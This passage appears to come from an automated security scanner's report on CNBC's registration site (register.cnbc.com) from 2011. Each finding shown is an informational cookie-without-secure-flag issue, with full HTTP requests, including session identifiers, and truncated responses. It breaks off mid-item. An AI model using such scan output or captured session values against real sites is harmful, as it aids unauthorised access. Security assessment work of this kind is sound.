HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "135b-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 4955 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ /* CSS Document */ .cnbc_member_center_backbg{ background-image:url(../images/registration-04.jpg); background-repeat:repeat; } .cnbc_member_center_headerbg{ background-image:url(../images/membe...[SNIP]...
7.46. https://register.cnbc.com/css/newRegistration.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/newRegistration.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/newRegistration.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:37 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 20 Jan 2010 20:57:31 GMT ETag: "1778-47d9ed5bbc4c0" Accept-Ranges: bytes Content-Length: 6008 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ body{background-color:#FFFFFF;margin:0px; padding:0px} div{} /* border:1px solid */ .mainContent{width:635px;padding:0px;} .headerMessage{font-family:Arial;font-size:17;font-weight:bold;color:#4248...[SNIP]...
7.47. https://register.cnbc.com/css/registration.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/css/registration.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /css/registration.css HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "2a54-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 10836 Connection: close Content-Type: text/cssSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ .bodyclass { margin-top: 0px; background-image:url(../images/tile.gif); background-repeat:repeat; } .regis_copyright { font-family: Arial, Helvetica, sans-serif; font-size: 11px; font-...[SNIP]...
7.48. https://register.cnbc.com/email/EmailSupport.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/email/EmailSupport.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /email/EmailSupport.jsp HTTP/1.1 Host: register.cnbc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:43 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/ Content-Length: 91322 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <script lang="javascript" src="js/subjects.js"></script> <title>Contact Customer Service</...[SNIP]...
7.49. https://register.cnbc.com/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339311702; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:01:54 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Content-Length: 209 Connection: close Content-Type: text/html; charset=iso-8859-1Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:54 GMT; path=/ <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /favicon.ico was not found on this server.</p> </body...[SNIP]...
7.50. https://register.cnbc.com/forgotPassword1.do
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/forgotPassword1.do
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /forgotPassword1.do HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do Content-Length: 45 Cache-Control: max-age=0 Origin: https://register.cnbc.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E; TZM=-300; s_cc=true; s_nr=1315339333234; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/images/clickToContinue.gif%2526ot%253DIMAGE step=step1&emailAddress=xss%40xss.cx&x=21&y=7
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:02:14 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html;charset=UTF-8Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:02:14 GMT; path=/ Content-Length: 85679 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <title>Reset Password</title> <link href="/css/member_center_sytles.css" rel="stylesheet" typ...[SNIP]...
7.51. https://register.cnbc.com/forgotpassword1.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/forgotpassword1.jsp
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /forgotpassword1.jsp HTTP/1.1 Host: register.cnbc.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA
Response
HTTP/1.1 302 Moved Temporarily Date: Tue, 06 Sep 2011 15:01:47 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Cache-Control: pre-check=0, post-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Location: http://register.cnbc.com/forgotPassword.do Content-Length: 0 Connection: close Content-Type: text/htmlSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:47 GMT; path=/
7.52. https://register.cnbc.com/images/clickToContinue.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/clickToContinue.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/clickToContinue.gif HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:50 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Fri, 29 May 2009 14:10:16 GMT ETag: "4a4-46b0da2bec200" Accept-Ranges: bytes Content-Length: 1188 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:50 GMT Connection: close Content-Type: image/gifSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ GIF89a~.................................BHXNSbOTcY^l[`nZ_m~..|..............ejvhmypu.ty.............rw.....................................................................................................[SNIP]...
7.53. https://register.cnbc.com/images/loaderImage.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/loaderImage.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/loaderImage.gif HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "109e-46941f222cbc0" Accept-Ranges: bytes Content-Length: 4254 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/gifSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ GIF89a.......,*,.........dfd...............DFD...trt..................464.........ljl............TVT...tvt...!..NETSCAPE2.0.....!.......,............$j..Ab.J..I.*U.*..).*..@$.........\N....(.: H..Cd6...[SNIP]...
7.54. https://register.cnbc.com/images/memberCenterHeader.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/memberCenterHeader.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/memberCenterHeader.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:50 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "2a29-46941f222cbc0" Accept-Ranges: bytes Content-Length: 10793 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:50 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ ......JFIF.....H.H.....5Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:02:10 13:45:24............[SNIP]...
7.55. https://register.cnbc.com/images/submitPreferences.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/submitPreferences.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/submitPreferences.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "334c-46941f222cbc0" Accept-Ranges: bytes Content-Length: 13132 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ ......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:02:10 13:53:01............[SNIP]...
7.56. https://register.cnbc.com/images/tick.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/tick.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/tick.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "3a40-46941f222cbc0" Accept-Ranges: bytes Content-Length: 14912 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ ......JFIF.....H.H..... Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:03:12 10:28:37............[SNIP]...
7.57. https://register.cnbc.com/images/tile_02.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/tile_02.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/tile_02.gif HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:50 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Thu, 31 Mar 2011 15:21:14 GMT ETag: "2c-49fc8d80f4e80" Accept-Ranges: bytes Content-Length: 44 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:50 GMT Connection: close Content-Type: image/gifSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:50 GMT; path=/ GIF89a.......02;68@!.......,...........DnX.;
7.58. https://register.cnbc.com/images/wrong.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/images/wrong.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /images/wrong.jpg HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339298449; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:40 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "3d8b-46941f222cbc0" Accept-Ranges: bytes Content-Length: 15755 Cache-Control: max-age=86400 Expires: Wed, 07 Sep 2011 15:01:40 GMT Connection: close Content-Type: image/jpegSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:40 GMT; path=/ ......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i............... ....'.. ....'.Adobe Photoshop CS3 Windows.2009:03:12 10:43:29............[SNIP]...
7.59. https://register.cnbc.com/js/membercenter.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/membercenter.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/membercenter.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/forgotPassword.do User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA; JSESSIONID=2468AC9921E8E376640A3CB7840EC38E
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:01:49 GMT Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19 Last-Modified: Wed, 06 May 2009 17:44:23 GMT ETag: "13eb-46941f222cbc0" Accept-Ranges: bytes Content-Length: 5099 Connection: close Content-Type: application/x-javascriptSet-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/ //This variable is the only one that needs to be changed when the free web cam offer expires var freeWebCamOffer="false"; //var freeWebCamOffer="true"; //We need to use the db index of "United States...[SNIP]...
7.60. https://register.cnbc.com/js/prototype_ajax.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://register.cnbc.com
Path:
/js/prototype_ajax.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/prototype_ajax.js HTTP/1.1 Host: register.cnbc.com Connection: keep-alive Referer: https://register.cnbc.com/registerUser.do?iframe=yes&source=register User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627
Response
